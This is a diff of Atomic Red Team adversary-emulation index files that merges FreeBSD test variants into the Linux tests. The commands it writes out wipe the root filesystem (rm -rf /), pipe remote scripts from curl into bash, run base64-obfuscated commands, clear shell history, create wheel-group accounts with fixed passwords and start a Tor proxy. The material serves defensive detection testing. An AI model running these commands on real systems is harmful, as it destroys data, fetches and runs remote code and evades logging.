         prereq_command: "$(getent passwd testuser1 >/dev/null) && $(which sshpass
           >/dev/null)\n"
         get_prereq_command: |
-          /usr/sbin/useradd testuser1
-          echo -e 'pwd101!\npwd101!' | passwd testuser1
-          (which yum && yum -y install epel-release sshpass)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y sshpass)
+          [ "$(uname)" = 'FreeBSD' ] && pw useradd testuser1 -g wheel -s /bin/sh || /usr/sbin/useradd testuser1
+          [ "$(uname)" = 'FreeBSD' ] && echo 'pwd101!' | pw mod user testuser1 -h 0 || echo -e 'pwd101!\npwd101!' | passwd testuser1
+          (which yum && yum -y install epel-release sshpass)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y sshpass)||(which pkg && pkg install -y sshpass)
       executor:
         command: 'sshpass -p ''pwd101!'' ssh testuser1@localhost -T hostname
 
           '
-        cleanup_command: 'userdel -f testuser1
-
-          '
-        name: sh
-    - name: Disable sh History Logging with SSH -T (freebsd)
-      auto_generated_guid: ec3f2306-dd19-4c4b-bed7-92d20e9b1dee
-      description: 'Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T
-        keeps the ssh client from catching a proper TTY, which is what usually gets
-        logged on lastlog
-
-        '
-      supported_platforms:
-      - linux
-      dependencies:
-      - description: 'Install sshpass and create user account used for excuting
-
-          '
-        prereq_command: "$(getent passwd testuser1 >/dev/null) && $(which sshpass
-          >/dev/null)\n"
-        get_prereq_command: |
-          pw useradd testuser1 -g wheel -s /bin/sh
-          echo 'pwd101!' | pw mod user testuser1 -h 0
-          (which pkg && pkg install -y sshpass)
-      executor:
-        command: 'sshpass -p ''pwd101!'' ssh testuser1@localhost -T hostname
-
-          '
-        cleanup_command: 'rmuser -y testuser1
+        cleanup_command: '[ "$(uname)" = ''FreeBSD'' ] && rmuser -y testuser1 || userdel
+          -f testuser1
 
           '
         name: sh
@@ -28349,23 +28272,10 @@ defense-evasion:
       supported_platforms:
       - linux
       executor:
-        command: 'rm -rf / --no-preserve-root > /dev/null 2> /dev/null
+        command: '[ "$(uname)" = ''Linux'' ] && rm -rf / --no-preserve-root > /dev/null
+          2> /dev/null || chflags -R 0 / && rm -rf / > /dev/null 2> /dev/null
 
           '
-        name: bash
-    - name: Delete Filesystem - FreeBSD
-      auto_generated_guid: b5aaca7e-a48f-4f1b-8f0f-a27b8f516608
-      description: 'This test deletes the entire root filesystem of a FreeBSD system.
-        This technique was used by Amnesia IoT malware to avoid analysis. This test
-        is dangerous and destructive, do NOT use on production equipment.
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        command: |
-          chflags -R 0 /
-          rm -rf / > /dev/null 2> /dev/null
         name: sh
     - name: Delete Prefetch File
       auto_generated_guid: 36f96049-0ad7-4a5f-8418-460acaeb92fb
@@ -32072,26 +31982,11 @@ defense-evasion:
         name: bash
         elevation_required: true
         command: |
-          useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art
-          su art
-          whoami
-          exit
-        cleanup_command: "userdel -r art \n"
-    - name: Create local account (FreeBSD)
-      auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0
-      description: 'An adversary may wish to create an account with admin privileges
-        to work with. In this test we create a "art" user with the password art, switch
-        to art, execute whoami, exit and delete the art user.
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        name: sh
-        elevation_required: true
-        command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art)
-          | pw mod user testuser1 -h 0      \nsu art\nwhoami\nexit\n"
-        cleanup_command: 'rmuser -y art
+          password=$(openssl passwd -1 art)
+          ([ "$(uname)" = 'Linux' ] && useradd --shell /bin/bash --create-home --password $password art) || (pw useradd art -g wheel -s /bin/sh && (echo $password | pw mod user testuser1 -h 0))
+          su art -c "whoami; exit"
+        cleanup_command: '[ "$(uname)" = ''Linux'' ] && userdel art -rf || rmuser
+          -y art
 
           '
     - name: Reactivate a locked/expired account (Linux)
@@ -51032,26 +50927,11 @@ privilege-escalation:
         name: bash
         elevation_required: true
         command: |
-          useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art
-          su art
-          whoami
-          exit
-        cleanup_command: "userdel -r art \n"
-    - name: Create local account (FreeBSD)
-      auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0
-      description: 'An adversary may wish to create an account with admin privileges
-        to work with. In this test we create a "art" user with the password art, switch
-        to art, execute whoami, exit and delete the art user.
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        name: sh
-        elevation_required: true
-        command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art)
-          | pw mod user testuser1 -h 0      \nsu art\nwhoami\nexit\n"
-        cleanup_command: 'rmuser -y art
+          password=$(openssl passwd -1 art)
+          ([ "$(uname)" = 'Linux' ] && useradd --shell /bin/bash --create-home --password $password art) || (pw useradd art -g wheel -s /bin/sh && (echo $password | pw mod user testuser1 -h 0))
+          su art -c "whoami; exit"
+        cleanup_command: '[ "$(uname)" = ''Linux'' ] && userdel art -rf || rmuser
+          -y art
 
           '
     - name: Reactivate a locked/expired account (Linux)
@@ -56553,29 +56433,14 @@ execution:
         '
       supported_platforms:
       - linux
-      executor:
-        name: sh
-        elevation_required: false
-        command: "ART=$(echo -n \"id\" |base64 -w 0)\necho \"\\$ART=$ART\"\necho -n
-          \"$ART\" |base64 -d |/bin/bash\nunset ART \n"
-    - name: Obfuscated command line scripts (freebsd)
-      auto_generated_guid: 5dc1d9dd-f396-4420-b985-32b1c4f79062
-      description: 'An adversary may pre-compute the base64 representations of the
-        terminal commands that they wish to execute in an attempt to avoid or frustrate
-        detection. The following commands base64 encodes the text string id, then
-        base64 decodes the string, then pipes it as a command to bash, which results
-        in the id command being executed.
-
-        '
-      supported_platforms:
-      - linux
       executor:
         name: sh
         elevation_required: false
         command: |
-          ART=$(echo -n "id" |b64encode -r -)
+          [ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
+          ART=$(echo -n "id" | $encodecmd)
           echo "\$ART=$ART"
-          echo -n "$ART" |b64decode -r |/bin/sh
+          echo -n "$ART" | $decodecmd |/bin/bash
           unset ART
     - name: Change login shell
       auto_generated_guid: c7ac59cb-13cc-4622-81dc-6d2fee9bfac7
@@ -56601,42 +56466,12 @@ execution:
         name: bash
         elevation_required: true
         command: |
-          useradd -s /bin/bash art
+          [ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
           cat /etc/passwd |grep ^art
           chsh -s /bin/sh art
           cat /etc/passwd |grep ^art
-        cleanup_command: 'userdel art
-
-          '
-    - name: Change login shell (freebsd)
-      auto_generated_guid: 33b68b9b-4988-4caf-9600-31b7bf04227c
-      description: "An adversary may want to use a different login shell. The chsh
-        command changes the user login shell. The following test, creates an art user
-        with a /bin/sh shell, changes the users shell to sh, then deletes the art
-        user. \n"
-      supported_platforms:
-      - linux
-      dependencies:
-      - description: 'chsh - change login shell, must be installed
-
-          '
-        prereq_command: 'if [ -f /usr/bin/chsh ]; then echo "exit 0"; else echo "exit
-          1"; exit 1; fi
-
-          '
-        get_prereq_command: 'echo "Automated installer not implemented yet, please
-          install chsh manually"
-
-          '
-      executor:
-        name: sh
-        elevation_required: true
-        command: |
-          pw useradd art -g wheel -s /bin/csh
-          cat /etc/passwd |grep ^art
-          chsh -s /bin/sh art
-          cat /etc/passwd |grep ^art
-        cleanup_command: 'rmuser -y art
+        cleanup_command: '[ "$(uname)" = ''FreeBSD'' ] && rmuser -y art || userdel
+          art
 
           '
     - name: Environment variable scripts
@@ -56649,25 +56484,6 @@ execution:
         '
       supported_platforms:
       - linux
-      executor:
-        name: bash
-        elevation_required: false
-        command: |
-          export ART='echo "Atomic Red Team was here... T1059.004"'
-          echo $ART |/bin/bash
-        cleanup_command: 'unset ART
-
-          '
-    - name: Environment variable scripts (freebsd)
-      auto_generated_guid: 663b205d-2121-48a3-a6f9-8c9d4d87dfee
-      description: 'An adversary may place scripts in an environment variable because
-        they can''t or don''t wish to create script files on the host. The following
-        test, in a bash shell, exports the ART variable containing an echo command,
-        then pipes the variable to /bin/sh
-
-        '
-      supported_platforms:
-      - linux
       executor:
         name: sh
         elevation_required: false
@@ -56698,59 +56514,24 @@ execution:
           default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh
       dependency_executor_name: bash
       dependencies:
-      - description: 'Check if running on a Debian based machine.
+      - description: 'Check if curl is installed on the machine.
 
           '
-        prereq_command: |
-          if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
-          if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
-        get_prereq_command: 'apt update && apt install -y curl
+        prereq_command: 'if [ -x "$(command -v curl)" ]; then echo "curl is installed";
+          else echo "curl is NOT installed"; exit 1; fi
 
           '
-      executor:
-        name: bash
-        elevation_required: false
-        command: "cd /tmp\ncurl -s #{remote_url}\nls -la /tmp/art.txt\ncurl -s #{remote_url}
-          |bash\nls -la /tmp/art.txt      \n"
-        cleanup_command: 'rm /tmp/art.txt
-
-          '
-    - name: Detecting pipe-to-shell (freebsd)
-      auto_generated_guid: 1a06b1ec-0cca-49db-a222-3ebb6ef25632
-      description: 'An adversary may develop a useful utility or subvert the CI/CD
-        pipe line of a legitimate utility developer, who requires or suggests installing
-        their utility by piping a curl download directly into bash. Of-course this
-        is a very bad idea. The adversary may also take advantage of this BLIND install
-        method and selectively running extra commands in the install script for those
-        who DO pipe to bash and not for those who DO NOT. This test uses curl to download
-        the pipe-to-shell.sh script, the first time without piping it to bash and
-        the second piping it into bash which executes the echo command.
-
-        '
-      supported_platforms:
-      - linux
-      input_arguments:
-        remote_url:
-          description: url of remote payload
-          type: url
-          default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh
-      dependency_executor_name: sh
-      dependencies:
-      - description: 'Check if running on a Debian based machine.
-
-          '
-        prereq_command: |
-          if grep -iq "FreeBSD" /etc/os-release; then echo "FreeBSD"; else echo "NOT FreeBSD"; exit 1; fi
-          if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
-        get_prereq_command: 'pkg update && pkg install -y curl
+        get_prereq_command: 'which apt && apt update && apt install -y curl || which
+          pkg && pkg update && pkg install -y curl
 
           '
       executor:
         name: sh
         elevation_required: false
-        command: "cd /tmp\ncurl -s #{remote_url}\nls -la /tmp/art.txt\ncurl -s #{remote_url}
-          |bash\nls -la /tmp/art.txt      \n"
-        cleanup_command: "rm /tmp/art.txt      \n"
+        command: "cd /tmp\ncurl -s #{remote_url} |bash\nls -la /tmp/art.txt      \n"
+        cleanup_command: 'rm /tmp/art.txt
+
+          '
     - name: Current kernel information enumeration
       auto_generated_guid: 3a53734a-9e26-4f4b-ad15-059e767f5f14
       description: 'An adversary may want to enumerate the kernel information to tailor
@@ -78714,26 +78495,11 @@ persistence:
         name: bash
         elevation_required: true
         command: |
-          useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art
-          su art
-          whoami
-          exit
-        cleanup_command: "userdel -r art \n"
-    - name: Create local account (FreeBSD)
-      auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0
-      description: 'An adversary may wish to create an account with admin privileges
-        to work with. In this test we create a "art" user with the password art, switch
-        to art, execute whoami, exit and delete the art user.
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        name: sh
-        elevation_required: true
-        command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art)
-          | pw mod user testuser1 -h 0      \nsu art\nwhoami\nexit\n"
-        cleanup_command: 'rmuser -y art
+          password=$(openssl passwd -1 art)
+          ([ "$(uname)" = 'Linux' ] && useradd --shell /bin/bash --create-home --password $password art) || (pw useradd art -g wheel -s /bin/sh && (echo $password | pw mod user testuser1 -h 0))
+          su art -c "whoami; exit"
+        cleanup_command: '[ "$(uname)" = ''Linux'' ] && userdel art -rf || rmuser
+          -y art
 
           '
     - name: Reactivate a locked/expired account (Linux)
@@ -81472,7 +81238,7 @@ command-and-control:
           stop-process -name "tor" | out-null
         name: powershell
         elevation_required: false
-    - name: Tor Proxy Usage - Debian/Ubuntu
+    - name: Tor Proxy Usage - Debian/Ubuntu/FreeBSD
       auto_generated_guid: 5ff9d047-6e9c-4357-b39b-5cf89d9b59c7
       description: "This test is designed to launch the tor proxy service, which is
         what is utilized in the background by the Tor Browser and other applications
@@ -81487,12 +81253,15 @@ command-and-control:
           exit 1; fi
 
           '
-        get_prereq_command: 'sudo apt-get -y install tor
+        get_prereq_command: "(which apt && sudo apt-get -y install tor) || (which
+          pkg && pkg install -y tor)\n"
+      executor:
+        command: '[ "$(uname)" = ''FreeBSD'' ] && sysrc tor_enable="YES" && service
+          tor start || sudo systemctl start tor
 
           '
-      executor:
-        command: "sudo systemctl start tor \n"
-        cleanup_command: 'sudo systemctl stop tor
+        cleanup_command: '[ "$(uname)" = ''FreeBSD'' ] && service tor stop && sysrc
+          -x tor_enable || sudo systemctl stop tor
 
           '
         name: sh
@@ -81523,33 +81292,6 @@ command-and-control:
 
           '
         name: sh
-    - name: Tor Proxy Usage - FreeBSD
-      auto_generated_guid: 550ec67d-a99e-408b-816a-689271b27d2a
-      description: "This test is designed to launch the tor proxy service, which is
-        what is utilized in the background by the Tor Browser and other applications
-        with add-ons in order to provide onion routing functionality.\nUpon successful
-        execution, the tor proxy service will be launched. \n"
-      supported_platforms:
-      - linux
-      dependency_executor_name: sh
-      dependencies:
-      - description: "Tor must be installed on the machine \n"
-        prereq_command: 'if [ -x "$(command -v tor --version)" ]; then exit 0; else
-          exit 1; fi
-
-          '
-        get_prereq_command: 'pkg install -y tor
-
-          '
-      executor:
-        command: |
-          sysrc tor_enable="YES"
-          service tor start
-        cleanup_command: |
-          service tor stop
-          sysrc -x tor_enable
-        name: sh
-        elevation_required: true
   T1001:
     technique:
       x_mitre_platforms:
@@ -85453,25 +85195,6 @@ collection:
       supported_platforms:
       - linux
       - macos
-      input_arguments:
-        output_file:
-          description: Location to save downloaded discovery.bat file
-          type: path
-          default: "/tmp/T1074.001_discovery.log"
-      executor:
-        command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh
-          | bash -s > #{output_file}
-
-          '
-        name: bash
-    - name: Stage data from Discovery.sh (freebsd)
-      auto_generated_guid: 4fca7b49-379d-4493-8890-d6297750fa46
-      description: 'Utilize curl to download discovery.sh and execute a basic information
-        gathering shell script
-
-        '
-      supported_platforms:
-      - linux
       input_arguments:
         output_file:
           description: Location to save downloaded discovery.bat file
@@ -85479,18 +85202,24 @@ collection:
           default: "/tmp/T1074.001_discovery.log"
       dependency_executor_name: sh
       dependencies:
-      - description: 'Check if curl is installed.
+      - description: 'Check if curl is installed on the machine.
 
           '
-        prereq_command: 'if [ ! -x "$(command -v curl)" ]; then exit 1; else exit
-          0; fi;
+        prereq_command: 'if [ -x "$(command -v curl)" ]; then echo "curl is installed";
+          else echo "curl is NOT installed"; exit 1; fi
+
+          '
+        get_prereq_command: 'which apt && apt update && apt install -y curl || which
+          pkg && pkg update && pkg install -y curl
 
           '
-        get_prereq_command: "(which pkg && pkg install -y curl)\n"
       executor:
         command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh
           | sh -s > #{output_file}
 
+          '
+        cleanup_command: 'rm #{output_file}
+
           '
         name: sh
     - name: Zip a Folder with PowerShell for Staging in Temp
@@ -104315,29 +104044,8 @@ discovery:
 
           '
       executor:
-        command: |
-          lastlog > #{output_file}
-          cat #{output_file}
-        cleanup_command: 'rm -f #{output_file}
-
-          '
-        name: sh
-    - name: Show if a user account has ever logged in remotely (freebsd)
-      auto_generated_guid: 0f73418f-d680-4383-8a24-87bc97fe4e35
-      description: 'Show if a user account has ever logged in remotely
-
-        '
-      supported_platforms:
-      - linux
-      input_arguments:
-        output_file:
-          description: Path where captured results will be placed
-          type: path
-          default: "/tmp/T1087.001.txt"
-      executor:
-        command: |
-          lastlogin > #{output_file}
-          cat #{output_file}
+        command: "[ \"$(uname)\" = 'FreeBSD' ] && cmd=\"lastlogin\" || cmd=\"lastlog\"
+          \n$cmd > #{output_file}\ncat #{output_file}\n"
         cleanup_command: 'rm -f #{output_file}
 
           '
@@ -121807,26 +121515,11 @@ initial-access:
         name: bash
         elevation_required: true
         command: |
-          useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art
-          su art
-          whoami
-          exit
-        cleanup_command: "userdel -r art \n"
-    - name: Create local account (FreeBSD)
-      auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0
-      description: 'An adversary may wish to create an account with admin privileges
-        to work with. In this test we create a "art" user with the password art, switch
-        to art, execute whoami, exit and delete the art user.
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        name: sh
-        elevation_required: true
-        command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art)
-          | pw mod user testuser1 -h 0      \nsu art\nwhoami\nexit\n"
-        cleanup_command: 'rmuser -y art
+          password=$(openssl passwd -1 art)
+          ([ "$(uname)" = 'Linux' ] && useradd --shell /bin/bash --create-home --password $password art) || (pw useradd art -g wheel -s /bin/sh && (echo $password | pw mod user testuser1 -h 0))
+          su art -c "whoami; exit"
+        cleanup_command: '[ "$(uname)" = ''Linux'' ] && userdel art -rf || rmuser
+          -y art
 
           '
     - name: Reactivate a locked/expired account (Linux)

atomics/Indexes/linux-index.yaml

@@ -4615,23 +4615,16 @@ defense-evasion:
       description: 'Clears bash history via rm
 
         '
+      input_arguments:
+        history_path:
+          description: Bash history path
+          type: path
+          default: "~/.bash_history"
       supported_platforms:
       - linux
       - macos
       executor:
-        command: 'rm ~/.bash_history
-
-          '
-        name: sh
-    - name: Clear sh history (rm)
-      auto_generated_guid: 448893f8-1d5d-4ae2-9017-7fcd73a7e100
-      description: 'Clears sh history via rm
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        command: 'rm ~/.sh_history
+        command: 'rm #{history_path}
 
           '
         name: sh
@@ -4640,22 +4633,15 @@ defense-evasion:
       description: 'Clears bash history via echo
 
         '
+      input_arguments:
+        history_path:
+          description: Bash history path
+          type: path
+          default: "~/.bash_history"
       supported_platforms:
       - linux
       executor:
-        command: 'echo "" > ~/.bash_history
-
-          '
-        name: sh
-    - name: Clear sh history (echo)
-      auto_generated_guid: a4d63cb3-9ed9-4837-9480-5bf6b09a6c96
-      description: 'Clears sh history via echo
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        command: 'echo "" > ~/.sh_history
+        command: 'echo "" > #{history_path}
 
           '
         name: sh
@@ -4667,20 +4653,13 @@ defense-evasion:
       supported_platforms:
       - linux
       - macos
+      input_arguments:
+        history_path:
+          description: Bash history path
+          type: path
+          default: "~/.bash_history"
       executor:
-        command: 'cat /dev/null > ~/.bash_history
-
-          '
-        name: sh
-    - name: Clear sh history (cat dev/null)
-      auto_generated_guid: ecaefd53-6fa4-4781-ba51-d9d6fb94dbdc
-      description: 'Clears sh history via cat /dev/null
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        command: 'cat /dev/null > ~/.sh_history
+        command: 'cat /dev/null > #{history_path}
 
           '
         name: sh
@@ -4692,20 +4671,13 @@ defense-evasion:
       supported_platforms:
       - linux
       - macos
+      input_arguments:
+        history_path:
+          description: Bash history path
+          type: path
+          default: "~/.bash_history"
       executor:
-        command: 'ln -sf /dev/null ~/.bash_history
-
-          '
-        name: sh
-    - name: Clear sh history (ln dev/null)
-      auto_generated_guid: 3126aa7a-8768-456f-ae05-6ab2d4accfdd
-      description: 'Clears sh history via a symlink to /dev/null
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        command: 'ln -sf /dev/null ~/.sh_history
+        command: 'ln -sf /dev/null #{history_path}
 
           '
         name: sh
@@ -4716,20 +4688,13 @@ defense-evasion:
         '
       supported_platforms:
       - linux
+      input_arguments:
+        history_path:
+          description: Bash history path
+          type: path
+          default: "~/.bash_history"
       executor:
-        command: 'truncate -s0 ~/.bash_history
-
-          '
-        name: sh
-    - name: Clear sh history (truncate)
-      auto_generated_guid: e14d9bb0-c853-4503-aa89-739d5c0a5818
-      description: 'Clears sh history via truncate
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        command: 'truncate -s0 ~/.sh_history
+        command: 'truncate -s0 #{history_path}
 
           '
         name: sh
@@ -4748,22 +4713,6 @@ defense-evasion:
           export HISTFILESIZE=0
           history -c
         name: sh
-    - name: Clear history of a bunch of shells (freebsd)
-      auto_generated_guid: 9bf7c8af-5e12-42ea-bf6b-b0348fb9dfb0
-      description: 'Clears the history of a bunch of different shell types by setting
-        the history size to zero
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        command: |
-          unset HISTFILE
-          unset histfile
-          export HISTFILESIZE=0
-          export HISTSIZE=0
-          history -c
-        name: sh
     - name: Clear and Disable Bash History Logging
       auto_generated_guid: 784e4011-bd1a-4ecd-a63a-8feb278512e6
       description: 'Clears the history and disable bash history logging of the current
@@ -4814,41 +4763,15 @@ defense-evasion:
         prereq_command: "$(getent passwd testuser1 >/dev/null) && $(which sshpass
           >/dev/null)\n"
         get_prereq_command: |
-          /usr/sbin/useradd testuser1
-          echo -e 'pwd101!\npwd101!' | passwd testuser1
-          (which yum && yum -y install epel-release sshpass)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y sshpass)
+          [ "$(uname)" = 'FreeBSD' ] && pw useradd testuser1 -g wheel -s /bin/sh || /usr/sbin/useradd testuser1
+          [ "$(uname)" = 'FreeBSD' ] && echo 'pwd101!' | pw mod user testuser1 -h 0 || echo -e 'pwd101!\npwd101!' | passwd testuser1
+          (which yum && yum -y install epel-release sshpass)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y sshpass)||(which pkg && pkg install -y sshpass)
       executor:
         command: 'sshpass -p ''pwd101!'' ssh testuser1@localhost -T hostname
 
           '
-        cleanup_command: 'userdel -f testuser1
-
-          '
-        name: sh
-    - name: Disable sh History Logging with SSH -T (freebsd)
-      auto_generated_guid: ec3f2306-dd19-4c4b-bed7-92d20e9b1dee
-      description: 'Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T
-        keeps the ssh client from catching a proper TTY, which is what usually gets
-        logged on lastlog
-
-        '
-      supported_platforms:
-      - linux
-      dependencies:
-      - description: 'Install sshpass and create user account used for excuting
-
-          '
-        prereq_command: "$(getent passwd testuser1 >/dev/null) && $(which sshpass
-          >/dev/null)\n"
-        get_prereq_command: |
-          pw useradd testuser1 -g wheel -s /bin/sh
-          echo 'pwd101!' | pw mod user testuser1 -h 0
-          (which pkg && pkg install -y sshpass)
-      executor:
-        command: 'sshpass -p ''pwd101!'' ssh testuser1@localhost -T hostname
-
-          '
-        cleanup_command: 'rmuser -y testuser1
+        cleanup_command: '[ "$(uname)" = ''FreeBSD'' ] && rmuser -y testuser1 || userdel
+          -f testuser1
 
           '
         name: sh
@@ -17875,23 +17798,10 @@ defense-evasion:
       supported_platforms:
       - linux
       executor:
-        command: 'rm -rf / --no-preserve-root > /dev/null 2> /dev/null
+        command: '[ "$(uname)" = ''Linux'' ] && rm -rf / --no-preserve-root > /dev/null
+          2> /dev/null || chflags -R 0 / && rm -rf / > /dev/null 2> /dev/null
 
           '
-        name: bash
-    - name: Delete Filesystem - FreeBSD
-      auto_generated_guid: b5aaca7e-a48f-4f1b-8f0f-a27b8f516608
-      description: 'This test deletes the entire root filesystem of a FreeBSD system.
-        This technique was used by Amnesia IoT malware to avoid analysis. This test
-        is dangerous and destructive, do NOT use on production equipment.
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        command: |
-          chflags -R 0 /
-          rm -rf / > /dev/null 2> /dev/null
         name: sh
   T1158:
     technique:
@@ -20358,26 +20268,11 @@ defense-evasion:
         name: bash
         elevation_required: true
         command: |
-          useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art
-          su art
-          whoami
-          exit
-        cleanup_command: "userdel -r art \n"
-    - name: Create local account (FreeBSD)
-      auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0
-      description: 'An adversary may wish to create an account with admin privileges
-        to work with. In this test we create a "art" user with the password art, switch
-        to art, execute whoami, exit and delete the art user.
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        name: sh
-        elevation_required: true
-        command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art)
-          | pw mod user testuser1 -h 0      \nsu art\nwhoami\nexit\n"
-        cleanup_command: 'rmuser -y art
+          password=$(openssl passwd -1 art)
+          ([ "$(uname)" = 'Linux' ] && useradd --shell /bin/bash --create-home --password $password art) || (pw useradd art -g wheel -s /bin/sh && (echo $password | pw mod user testuser1 -h 0))
+          su art -c "whoami; exit"
+        cleanup_command: '[ "$(uname)" = ''Linux'' ] && userdel art -rf || rmuser
+          -y art
 
           '
     - name: Reactivate a locked/expired account (Linux)
@@ -32629,26 +32524,11 @@ privilege-escalation:
         name: bash
         elevation_required: true
         command: |
-          useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art
-          su art
-          whoami
-          exit
-        cleanup_command: "userdel -r art \n"
-    - name: Create local account (FreeBSD)
-      auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0
-      description: 'An adversary may wish to create an account with admin privileges
-        to work with. In this test we create a "art" user with the password art, switch
-        to art, execute whoami, exit and delete the art user.
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        name: sh
-        elevation_required: true
-        command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art)
-          | pw mod user testuser1 -h 0      \nsu art\nwhoami\nexit\n"
-        cleanup_command: 'rmuser -y art
+          password=$(openssl passwd -1 art)
+          ([ "$(uname)" = 'Linux' ] && useradd --shell /bin/bash --create-home --password $password art) || (pw useradd art -g wheel -s /bin/sh && (echo $password | pw mod user testuser1 -h 0))
+          su art -c "whoami; exit"
+        cleanup_command: '[ "$(uname)" = ''Linux'' ] && userdel art -rf || rmuser
+          -y art
 
           '
     - name: Reactivate a locked/expired account (Linux)
@@ -36017,29 +35897,14 @@ execution:
         '
       supported_platforms:
       - linux
-      executor:
-        name: sh
-        elevation_required: false
-        command: "ART=$(echo -n \"id\" |base64 -w 0)\necho \"\\$ART=$ART\"\necho -n
-          \"$ART\" |base64 -d |/bin/bash\nunset ART \n"
-    - name: Obfuscated command line scripts (freebsd)
-      auto_generated_guid: 5dc1d9dd-f396-4420-b985-32b1c4f79062
-      description: 'An adversary may pre-compute the base64 representations of the
-        terminal commands that they wish to execute in an attempt to avoid or frustrate
-        detection. The following commands base64 encodes the text string id, then
-        base64 decodes the string, then pipes it as a command to bash, which results
-        in the id command being executed.
-
-        '
-      supported_platforms:
-      - linux
       executor:
         name: sh
         elevation_required: false
         command: |
-          ART=$(echo -n "id" |b64encode -r -)
+          [ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
+          ART=$(echo -n "id" | $encodecmd)
           echo "\$ART=$ART"
-          echo -n "$ART" |b64decode -r |/bin/sh
+          echo -n "$ART" | $decodecmd |/bin/bash
           unset ART
     - name: Change login shell
       auto_generated_guid: c7ac59cb-13cc-4622-81dc-6d2fee9bfac7
@@ -36065,42 +35930,12 @@ execution:
         name: bash
         elevation_required: true
         command: |
-          useradd -s /bin/bash art
+          [ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
           cat /etc/passwd |grep ^art
           chsh -s /bin/sh art
           cat /etc/passwd |grep ^art
-        cleanup_command: 'userdel art
-
-          '
-    - name: Change login shell (freebsd)
-      auto_generated_guid: 33b68b9b-4988-4caf-9600-31b7bf04227c
-      description: "An adversary may want to use a different login shell. The chsh
-        command changes the user login shell. The following test, creates an art user
-        with a /bin/sh shell, changes the users shell to sh, then deletes the art
-        user. \n"
-      supported_platforms:
-      - linux
-      dependencies:
-      - description: 'chsh - change login shell, must be installed
-
-          '
-        prereq_command: 'if [ -f /usr/bin/chsh ]; then echo "exit 0"; else echo "exit
-          1"; exit 1; fi
-
-          '
-        get_prereq_command: 'echo "Automated installer not implemented yet, please
-          install chsh manually"
-
-          '
-      executor:
-        name: sh
-        elevation_required: true
-        command: |
-          pw useradd art -g wheel -s /bin/csh
-          cat /etc/passwd |grep ^art
-          chsh -s /bin/sh art
-          cat /etc/passwd |grep ^art
-        cleanup_command: 'rmuser -y art
+        cleanup_command: '[ "$(uname)" = ''FreeBSD'' ] && rmuser -y art || userdel
+          art
 
           '
     - name: Environment variable scripts
@@ -36113,25 +35948,6 @@ execution:
         '
       supported_platforms:
       - linux
-      executor:
-        name: bash
-        elevation_required: false
-        command: |
-          export ART='echo "Atomic Red Team was here... T1059.004"'
-          echo $ART |/bin/bash
-        cleanup_command: 'unset ART
-
-          '
-    - name: Environment variable scripts (freebsd)
-      auto_generated_guid: 663b205d-2121-48a3-a6f9-8c9d4d87dfee
-      description: 'An adversary may place scripts in an environment variable because
-        they can''t or don''t wish to create script files on the host. The following
-        test, in a bash shell, exports the ART variable containing an echo command,
-        then pipes the variable to /bin/sh
-
-        '
-      supported_platforms:
-      - linux
       executor:
         name: sh
         elevation_required: false
@@ -36162,59 +35978,24 @@ execution:
           default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh
       dependency_executor_name: bash
       dependencies:
